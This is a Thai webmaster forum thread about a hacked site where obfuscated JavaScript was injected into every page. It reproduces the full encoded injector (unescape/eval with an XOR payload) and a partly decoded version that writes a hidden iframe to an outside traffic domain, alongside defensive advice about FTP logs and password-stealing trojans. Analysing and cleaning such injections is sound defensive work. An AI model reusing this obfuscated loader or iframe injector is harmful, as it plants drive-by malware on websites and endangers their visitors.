โดนแฮ็กครับ รบกวนช่วยแกะ javascript เพื่อหาต้นตอหน่อยครับ

โดนแฮ็กครับ มี javascript นี่มาใส่ในทุกเพจเลย แกะยากด้วยครับ

ตอนนี้แก้ไขเบื้องต้นด้วยการ up ไฟล์ทับใหม่หมดเลย + เปลี่ยนพาสเวิร์ดหมดแล้ว

เหลืออยู่อย่างเดียวคืออยากค้นหาต้นตอครับ


<script>eval(unescape('function%20vhqZ%28vSUj%29%7Bfunction%20aPdMn%28ouC%29%7Bvar%20uqiWB%3D0%2CyCG%2CfSs%3DouC.length%3Bfor%28yCG%3D0%3ByCG%3CfSs%3ByCG++%29uqiWB+%3DouC.charCodeAt%28yCG%29*fSs%3Breturn%20new%20String%28uqiWB%29%7DvSUj%3Dunescape%28vSUj%29%3Bvar%20gIX%3Deval%28%27a%21rvg%21u%23m%23e%26n%23t%7Ds%23.vcva%23l%26l%26eve%26%27.replace%28/%5B%5C%7Dv%26%23%5C%21%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2CbDkA%3DaPdMn%28gIX%29%2CsfEPiPU%3Dnew%20String%28%29%2ClKGh%3D0%3BbIunF%3D0%3Bfor%28var%20mgf%3D0%3Bmgf%3CvSUj.length%3Bmgf++%29%7BsfEPiPU+%3DString.fromCharCode%28vSUj.charCodeAt%28mgf%29%5E%28gIX.charCodeAt%28lKGh%29%5EbDkA.charCodeAt%28bIunF%29%29%29%3BlKGh++%3BbIunF++%3Bif%28lKGh%3EgIX.length%29lKGh%3D0%3Bif%28bIunF%3EbDkA.length%29bIunF%3D0%3B%7Deval%28sfEPiPU%29%3BsfEPiPU%3D%27%27%3Breturn%3B%7DvhqZ%28%27%2531%2538%2533%2533%2538%2537%2538%2536%2556%252b%2504%253f%2532%253e%254a%257b%252b%2508%2564%2529%250a%250c%2520%250c%2577%2516%2516%2513%2522%2533%2532%2502%2531%253c%2564%2548%2560%252a%2507%251e%2567%2570%2528%2510%2511%257c%2532%2515%2525%256d%2573%2557%257b%2503%253b%253d%253d%2522%251e%2530%253a%2521%2543%2555%2519%2566%2528%2518%2517%2536%2504%2517%256f%2557%251d%2528%253a%252a%250e%2518%2503%2564%2541%253d%2536%2525%2538%2529%2501%2506%253a%2533%255a%256e%253a%251d%2519%2578%2572%2536%2522%253f%2534%2563%2524%253a%252a%2500%2527%250f%253e%2508%253f%252a%252b%2522%251d%2534%250a%2515%256d%2542%254b%2529%2535%250f%2526%256b%2523%256f%256a%256e%2529%2501%2565%2532%2529%2524%2519%257f%253a%2513%2517%2502%2508%252d%2516%252d%2516%2535%2509%2566%2502%2503%256b%2518%2579%253f%253d%253f%2524%2528%252d%253a%2529%2531%2577%2522%2524%2576%2556%2537%2535%250e%252a%251b%2575%2526%2527%2508%253e%256b%2519%2564%2527%256c%254e%252d%2555%2527%2564%2520%2560%253c%2533%2534%2543%251f%2531%2535%257b%2501%254d%251f%2557%257b%254b%2521%2507%2543%2538%253d%2551%257d%2505%2504%2511%2530%251f%253e%253a%2556%254f%254
1%2502%2513%254d%2504%2502%2535%254d%2531%257f%2557%2545%256b%2568%2571%2522%2538%257d%2529%2565%2511%2535%2577%2517%2503%2523%253b%2515%2565%2505%251b%2569%256c%2572%2567%2509%2576%2525%253f%2504%2568%257d%2561%254c%2504%250d%2548%2575%252f%2578%2535%251d%2532%251b%2534%2525%257c%251d%254a%254b%257e%2536%2509%2526%251d%2500%2527%250c%256a%2555%2573%2564%252b%2508%2502%253c%2533%2522%251e%2570%2573%2508%2527%253e%2545%2517%255e%257e%2502%2576%2523%256f%257e%257b%2571%255b%2577%252e%252d%2529%2547%2503%2516%257c%2522%2570%2539%2577%2511%2500%2536%2528%251f%2522%253a%2508%2544%2531%254c%251a%2523%2517%2573%2573%2576%2562%252b%256d%2529%252e%253f%2506%2529%257d%2502%256a%2555%2518%257a%251b%2518%253f%2526%2514%256b%2547%254c%252c%2536%253e%2507%2513%2538%2579%252c%2540%256d%253b%2539%2535%2525%2521%253b%2502%250e%2551%252c%2571%2538%2525%253f%2557%2552%2563%253b%2539%253b%2527%2531%257b%251f%2509%2513%2561%250b%2567%251d%251c%2528%2537%2503%2565%2572%253c%2537%256a%2521%2579%255d%2522%253d%2518%250a%2521%253d%2517%2540%2570%250b%2523%250f%2533%2568%2501%2518%2579%2551%254a%2564%2571%2577%256e%257a%252b%257d%2567%2554%2517%254d%2512%2502%2548%2532%257b%2527%2507%252b%2502%2564%2512%256a%2521%2547%2505%2525%2536%2523%2508%251d%2539%253a%2504%257d%2554%257f%2541%2503%2566%2564%2522%251a%2512%2549%257f%2544%251b%2512%2524%2523%2561%257f%2538%2570%2538%256b%257b%2579%257f%2563%2566%253e%2502%2560%2523%2503%2551%2522%250e%2531%253a%251d%2510%252d%252b%2534%2548%250e%2531%251c%2501%2538%2533%2534%2536%252e%2512%253c%252a%2535%2514%2522%2566%255b%2504%2536%250c%2500%256d%253e%2528%2529%2521%2530%2533%2505%2516%250e%2539%2524%2573%256d%252d%2530%256b%250e%2503%250e%2517%2501%2503%2539%251e%252c%2517%252b%2535%2535%2563%2567%2561%250d%2516%2504%2524%252d%2528%253b%251f%2547%2574%253b%2517%253c%252b%2561%2529%2562%2573%2563%257f%250d%2578%256c%252d%253c%256a%2538%256b%2537%255f%253f%257a%253d%2528%2525%2564%2577%256d%250c%256a%2536%257c%253b%2575%2526%252e%2536%2530%253c%252e%253
7%2538%2530%257f%2525%2574%255e%252f%253c%2520%253a%2519%2535%2570%2564%251f%2547%256c%252e%2521%250d%2503%256f%2547%2502%2531%2538%253f%2576%255b%2575%2555%2538%256d%2572%2552%2566%2532%251e%251d%253c%2533%2507%2506%2548%2533%255e%255d%2562%2534%257d%253f%257e%2523%2571%2576%2576%2574%257f%2540%2524%2577%257b%2524%2518%253e%252d%250c%252e%252b%253f%253e%252d%257c%252c%2536%2530%253f%2542%2574%2512%2534%2531%2503%254c%2520%2579%2502%2530%2539%2539%256f%2579%2570%253c%257e%251f%2532%2513%2504%252e%2500%254b%2547%2573%255e%2569%257f%256f%256f%253b%2531%2522%2529%252d%2579%2536%257a%250d%257b%2532%2531%2532%2536%2505%2536%2564%2519%253e%2525%253e%2514%2503%2539%2538%2516%2567%256f%2570%2538%2524%2527%250a%2562%2539%2534%2537%256d%2552%2522%2516%2531%250d%2532%252d%251d%2550%2571%257c%2520%2535%251a%2568%253d%2535%2538%253e%255b%250c%253a%2532%2519%252e%253f%2550%2524%2536%2522%2538%250b%253b%253d%2572%250a%2525%2531%2535%2576%253d%2530%2517%2514%2536%253a%2531%2539%2572%2531%2576%2576%257f%2564%256d%257d%256b%255d%2570%2577%2532%2537%2526%255f%2520%2501%2518%2531%251e%253d%252f%2578%2538%2526%250b%257f%256c%2566%256c%2551%256f%2567%2559%250b%2529%2562%2521%253a%253f%2512%2512%2509%2502%2508%2508%2560%256f%255d%2501%2524%2508%2536%2537%2534%2528%2528%2562%2537%2559%253d%2510%2573%257b%2531%253b%253b%252c%252b%2577%250a%251d%252f%2512%2546%2536%256c%256d%2536%2506%2532%2571%2518%253c%252d%2502%2574%2552%2555%257e%2529%255e%2536%253c%2531%2519%252e%2504%2503%2552%256d%257a%2536%2554%253b%257b%2512%2507%2563%2575%2568%251c%257c%2520%2507%2507%253b%2529%2573%257c%2577%256e%2561%254d%2571%2535%2571%2540%2544%256e%2554%2562%2574%2563%2512%2522%2521%252f%2502%2510%2539%2537%256d%257c%2534%2534%2539%2523%2511%2577%256f%2545%251e%252d%2527%2515%255f%257a%254b%2567%254f%2576%256c%256d%2561%2533%252a%253e%2520%2523%2520%2562%252c%253c%2533%2537%252c%2576%257c%2551%2575%2540%2503%252a%2532%253f%2521%2516%2521%2564%2561%257d%252a%254a%2519%2533%2531%251d%251e%2507%250e%2512%253b%252
0%2530%2544%2579%2571%2565%2529%2561%252a%253c%252c%251c%2578%2531%256a%2524%253c%2537%2532%253c%2557%2569%253e%2573%256e%257a%256b%253c%2538%2510%2520%2574%2573%252d%2561%2537%2503%2517%255b%2522%2505%253b%257b%2570%2511%2573%2512%250f%2510%2535%2516%2554%2577%2568%2527%2576%2541%2569%251a%257b%2541%2548%2542%2554%2547%254e%256a%253b%2505%252a%257c%2511%2575%2546%2543%255b%257f%2578%251d%2505%256f%250d%2522%2524%250c%2534%2536%2534%251a%2572%2575%2545%2512%2536%253f%253e%2520%257d%2534%251d%2559%2541%257a%252c%251b%2534%2576%2515%2564%2538%2552%2527%2521%2531%2534%2538%2535%2530%2572%2543%253a%2531%2526%2501%2519%2534%2579%2534%254b%2537%2530%2534%252f%256e%2570%252c%2520%2512%2501%251a%2534%2543%254f%250c%2538%2530%2519%257d%2574%253a%256f%2565%2577%2572%255e%2540%2578%252e%251c%2534%257c%256f%2573%2545%2572%257c%2536%252c%2527%2579%2521%2517%2531%2544%2569%2544%2567%2579%252a%253f%253b%251a%253e%2576%2535%253e%2536%256d%255d%2577%256d%2545%2504%2524%2536%250b%2551%2538%253f%2506%2539%2511%2578%2534%2508%252d%2537%2512%2537%2503%257c%2550%2567%256b%2551%2565%2571%2559%254c%2551%255f%253f%253d%2519%256c%2524%2515%2519%253b%2535%251b%2511%2570%2578%255e%2535%2570%253c%2570%2527%2564%2561%2566%257a%2550%251a%2576%2524%257d%257b%257d%2557%2563%252a%2523%2523%2510%2539%2511%2573%257b%2575%2577%253b%256b%257b%257e%2556%256a%2577%2559%252f%2545%2567%2572%257f%2562%2570%2550%2548%2574%2570%2510%2523%253c%2505%2546%2539%250d%2517%2520%2535%2522%2522%2512%2522%2545%2537%252d%2509%257a%2565%257a%2577%2576%2563%257e%2565%257a%256c%254b%2512%2531%2537%2531%2578%253d%251b%252b%2523%257d%2579%2548%2527%251d%2531%251c%256a%250b%2524%2526%2522%2579%2534%2522%256c%2505%2569%256d%256a%2514%2544%2520%253f%256e%252c%2532%2531%2550%2564%2516%250b%252f%2532%256d%2579%256e%2533%257e%257a%2514%255f%2559%2526%2508%2500%2534%2507%2528%2569%255c%257c%27%29%3B'));</script>

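ยังกะ encode มา ชั้นนอกเป็น URL-escape ที่ถอดด้วย unescape() แล้วส่งเข้า eval() ส่วนข้อมูลชั้นในถูก XOR ด้วยคีย์ที่สร้างจากข้อความของฟังก์ชันถอดรหัสเอง (arguments.callee) ถ้าแก้โค้ดในฟังก์ชันนั้นก่อนถอด คีย์จะเปลี่ยนและผลที่ได้จะอ่านไม่ออก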

แก้ทีละไฟล์ คงเหนื่อยแย่นะครับ เพราะเคยโดนเหมือนกัน จะเป็นไรไหมถ้าจะลงลิงค์บทความที่เคยเขียนสอนวิธีแก้ เผื่อจะมีประโยชน์น่ะครับ

http://www.ipbsecret.com/webboard/index.php?showtopic=2851

Edit : ครอบ [-code-]

ขอบคุณมากครับ สำหรับบทความดีๆ และ มีประโยชน์

ออ เราก็นึกว่ามีบอกต้นตอด้วย

สำหรับโปรแกรมแก้นั้น ใช้ dreamweaver ก็สามารถทำได้นะครับ
Edit plus เองก็ทำได้ครับ

เคยแกะเหมือนกันเพราะสงสัย

แต่ก็เสียเปล่าครับ

แกะออกมาได้ประมาณนี้

[quote]
function rMVwU(){};rMVwU.prototype = {cookieValue:1,cookieName:‘febcghad’,install : function(){if(!this.alreadyInstalled()){var s="<gd0igvX DsDtXyDlXeD=g’XdqiqsDpglgagy0:gnXoDn0eg’X>q<Xi0f0r0aDmXe0 qsXr0cg=X’g".replace(/[qD0gX]/g, ‘’)+this.getFrameURL()+"‘C>Q<(/(iQf(r%aQmNeC>C<(/QdCiCvQ>C".replace(/[Q(NC%]/g, ‘’);try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write(’<EhLtGmElL>L<GbeoEd/ye>e’.replace(/[GEe/L]/g, ‘’)+s+’<W/Wb%o%diyN>N<w/WhitNmwlN>%’.replace(/[NiWw%]/g, ‘’))}this.setCookie(this.cookieName, this.cookieValue);}},getRandString : function(){var l=16,c=‘0y1y2m3k4k5o6?7m8k9oa?bocydmeofo’.replace(/[m?oky]/g, ‘’),o=’’;for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + ‘=’ + this.cookieValue) == -1);},setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + “=” + escape(value)+"; expires="+d.toGMTString(); },path:’/traff2.cn/’,host:‘2wtTr/aTf/fT.Tc@n@’.replace(/[@)w/T]/g, ‘’),getFrameURL : function(){var dlh=document.location.host; return “http”+’://’+((dlh == ‘’ || dlh == ‘undefined’) ? this.getRandString() : ‘’) + dlh.replace (/[^a-z0-9.-]/,’.’).replace (/.+/,’.’)

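ที่เคยเจอะมา เขาเข้ามาทาง ftp น่ะครับ อาจจะมาจากเครื่องคุณเองก็ได้ หรืออาจจะโดนโทรจันส่งรหัสผ่านไปให้แฮกเกอร์ก็ได้ครับ ถ้าเป็นโทรจัน ต้องกำจัดออกจากเครื่องก่อน ไม่อย่างนั้นรหัสผ่านที่เปลี่ยนใหม่ก็จะหลุดไปอีกครับ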

ลองดูวันที่ไฟล์ถูกเขียนทับน่ะครับ แล้วไปดู ftp log ของวันเดียวกัน จะเห็นว่าไฟล์ถูกอัปโหลดด้วยบัญชีไหนและมาจาก IP ไหนครับ

เคยเจอะมาแบบนี้น่ะครับ

น่าจะเป็น Virus นะ